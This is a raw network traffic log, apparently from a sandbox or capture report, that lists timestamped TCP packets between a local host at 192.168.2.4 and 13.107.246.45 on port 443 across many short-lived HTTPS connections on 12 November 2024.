                                  Nov 12, 2024 16:41:59.464049101 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.464066029 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.464205980 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.464211941 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.464314938 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.565123081 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.565140009 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.565211058 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.565217972 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.565253973 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.581372023 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.581389904 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.581444025 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.581449032 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.581491947 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.584201097 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.584216118 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.584256887 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.584261894 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.584301949 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.680979967 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.680998087 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.681044102 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.681050062 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.681093931 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.681119919 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.683093071 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.683108091 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.683132887 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.683137894 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.683171034 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.683188915 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.696940899 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.696955919 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.696993113 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.696996927 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.697036028 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.697073936 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.699537992 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.699559927 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.699609041 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.699613094 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.699651003 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.701457977 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.701473951 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.701567888 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.701572895 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.701613903 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.703242064 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.703255892 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.703289986 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.703295946 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.703319073 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.703330040 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.705157042 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.705172062 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.705204010 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.705208063 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.705234051 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.705234051 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.739516020 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.739532948 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.739592075 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.739597082 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.739636898 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.798655033 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.798700094 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.798712969 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.798749924 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.798924923 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.798924923 CET49763443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.798933983 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.798943043 CET4434976313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.941549063 CET49764443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.941581964 CET4434976413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.941646099 CET49764443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.945986032 CET49765443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.946014881 CET4434976513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.946072102 CET49765443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.946563005 CET49766443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.946571112 CET4434976613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.946626902 CET49766443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.948883057 CET49767443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.948890924 CET4434976713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.948937893 CET49767443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.949577093 CET49767443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.949589014 CET4434976713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.950990915 CET49768443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.951025009 CET4434976813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.951162100 CET49768443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.951718092 CET49768443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.951733112 CET4434976813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.952071905 CET49764443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.952086926 CET4434976413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.952409983 CET49765443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.952419996 CET4434976513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:41:59.952723026 CET49766443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:41:59.952732086 CET4434976613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.680789948 CET4434976713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.681765079 CET49767443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.681765079 CET49767443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.681782007 CET4434976713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.681790113 CET4434976713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.681922913 CET4434976413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.682579041 CET49764443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.682579041 CET49764443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.682593107 CET4434976413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.682605982 CET4434976413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.682719946 CET4434976513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.683069944 CET49765443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.683075905 CET4434976513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.684206963 CET49765443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.684211016 CET4434976513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.685336113 CET4434976813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.685961008 CET49768443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.685961008 CET49768443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.685988903 CET4434976813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.686002970 CET4434976813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.689508915 CET4434976613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.689798117 CET49766443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.689810038 CET4434976613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.692203999 CET49766443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.692208052 CET4434976613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.812289953 CET4434976713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.812350988 CET4434976713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.813589096 CET4434976513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.813607931 CET4434976513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.813673019 CET49767443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.813673019 CET49765443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.813690901 CET4434976513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.813709021 CET49767443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.813709021 CET49767443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.813716888 CET4434976713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.813724995 CET4434976713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.814409971 CET4434976513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.814584970 CET49765443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.815762043 CET49765443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.815762043 CET49765443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.815766096 CET4434976513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.815773010 CET4434976513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.820183039 CET4434976413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.820200920 CET4434976413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.820203066 CET49769443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.820233107 CET4434976913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.820308924 CET49769443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.820310116 CET4434976413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.820312023 CET49764443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.820544958 CET49769443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.820559978 CET4434976913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.820590019 CET49764443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.820745945 CET49770443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.820794106 CET4434977013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.820815086 CET49764443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.820815086 CET49764443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.820823908 CET4434976413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.820831060 CET4434976413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.820858002 CET49770443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.821749926 CET49770443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.821770906 CET4434977013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.822099924 CET4434976613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.822448015 CET4434976613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.822453022 CET4434976813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.822468996 CET4434976813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.822527885 CET49768443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.822530985 CET49766443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.822536945 CET4434976813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.822640896 CET49766443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.822640896 CET49766443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.822644949 CET4434976613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.822648048 CET4434976613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.822654963 CET49768443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.823621988 CET4434976813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.823653936 CET4434976813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.823951006 CET49768443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.824774981 CET49771443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.824779987 CET49768443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.824783087 CET4434977113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.824788094 CET4434976813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.824815989 CET49768443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.824820042 CET4434976813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.824846029 CET49771443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.825637102 CET49771443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.825645924 CET4434977113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.827538967 CET49773443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.827558041 CET4434977313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.827559948 CET49772443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.827610016 CET4434977213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.827681065 CET49773443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.827696085 CET49772443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.827959061 CET49773443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.827967882 CET4434977313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:00.827966928 CET49772443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:00.827989101 CET4434977213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.857462883 CET4434977113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.857904911 CET49771443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.857918024 CET4434977113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.858325958 CET49771443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.858330965 CET4434977113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.860006094 CET4434976913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.860340118 CET49769443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.860346079 CET4434976913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.860719919 CET49769443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.860723972 CET4434976913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.863568068 CET4434977313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.863636017 CET4434977213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.863931894 CET49773443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.863950014 CET4434977313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.863984108 CET49772443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.864006042 CET4434977213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.864371061 CET49773443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.864377022 CET4434977313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.864583015 CET49772443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.864588976 CET4434977213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.865597963 CET4434977013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.865852118 CET49770443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.865875006 CET4434977013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.866144896 CET49770443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.866149902 CET4434977013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.985136032 CET4434977113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.985949993 CET4434977113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.986026049 CET49771443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.986063957 CET49771443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.986073971 CET4434977113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.986082077 CET49771443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.986085892 CET4434977113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.988481045 CET49774443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.988512993 CET4434977413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.988569975 CET49774443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.988692045 CET49774443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.988704920 CET4434977413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.989698887 CET4434976913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.990221024 CET4434976913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.990268946 CET49769443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.990302086 CET49769443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.990302086 CET49769443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.990309000 CET4434976913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.990314960 CET4434976913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.991967916 CET49775443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.991997957 CET4434977513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.992090940 CET49775443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.992230892 CET49775443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.992242098 CET4434977513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.996709108 CET4434977213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.996757030 CET4434977213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.996799946 CET49772443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.996897936 CET49772443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.996905088 CET4434977213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.996915102 CET49772443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.996918917 CET4434977213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.998693943 CET49776443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.998704910 CET4434977613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:01.998938084 CET49776443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.999058962 CET49776443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:01.999068022 CET4434977613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.000695944 CET4434977313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.000796080 CET4434977313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.000874996 CET49773443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.000891924 CET49773443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.000897884 CET4434977313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.000909090 CET49773443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.000912905 CET4434977313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.002357006 CET4434977013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.002419949 CET4434977013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.002537966 CET49770443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.002563953 CET49777443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.002588034 CET4434977713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.002660990 CET49777443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.002758026 CET49770443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.002767086 CET4434977013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.002774000 CET49770443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.002779961 CET4434977013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.002789021 CET49777443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.002800941 CET4434977713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.004558086 CET49778443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.004565954 CET4434977813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.004712105 CET49778443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.004831076 CET49778443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.004838943 CET4434977813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.723083019 CET4434977413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.723603010 CET49774443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.723622084 CET4434977413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.724095106 CET49774443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.724100113 CET4434977413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.724684000 CET4434977713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.725451946 CET49777443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.725451946 CET49777443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.725470066 CET4434977713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.725482941 CET4434977713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.731811047 CET4434977513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.732486963 CET49775443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.732486963 CET49775443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.732501984 CET4434977513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.732515097 CET4434977513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.776169062 CET4434977613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.780697107 CET49776443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.780725956 CET4434977613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.781187057 CET49776443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.781193018 CET4434977613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.854217052 CET4434977413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.854420900 CET4434977413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.854459047 CET4434977713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.854546070 CET49774443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.854546070 CET49774443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.854571104 CET49774443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.854583025 CET4434977413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.855947971 CET4434977713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.856178045 CET49777443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.856204987 CET49777443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.856204987 CET49777443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.856219053 CET4434977713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.856228113 CET4434977713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.857146978 CET49779443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.857176065 CET4434977913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.857327938 CET49779443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.857834101 CET49780443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.857852936 CET4434978013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.857868910 CET49779443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.857881069 CET4434977913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.858036995 CET49780443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.858036995 CET49780443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.858058929 CET4434978013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.867785931 CET4434977513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.867881060 CET4434977513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.867988110 CET49775443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.867988110 CET49775443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.868169069 CET49775443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.868175030 CET4434977513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.869878054 CET49781443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.869906902 CET4434978113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.870021105 CET49781443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.870137930 CET49781443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.870153904 CET4434978113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.905381918 CET4434977613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.905618906 CET4434977613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.905698061 CET49776443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.905699015 CET49776443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.905754089 CET49776443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.905766964 CET4434977613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.907310963 CET49782443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.907336950 CET4434978213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:02.907471895 CET49782443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.907527924 CET49782443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:02.907536983 CET4434978213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:03.123728037 CET4434977813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:03.124201059 CET49778443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:03.124213934 CET4434977813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:03.124663115 CET49778443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:03.124669075 CET4434977813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:03.259196043 CET4434977813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:03.259728909 CET4434977813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:03.259955883 CET49778443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:03.259955883 CET49778443192.168.2.413.107.246.45
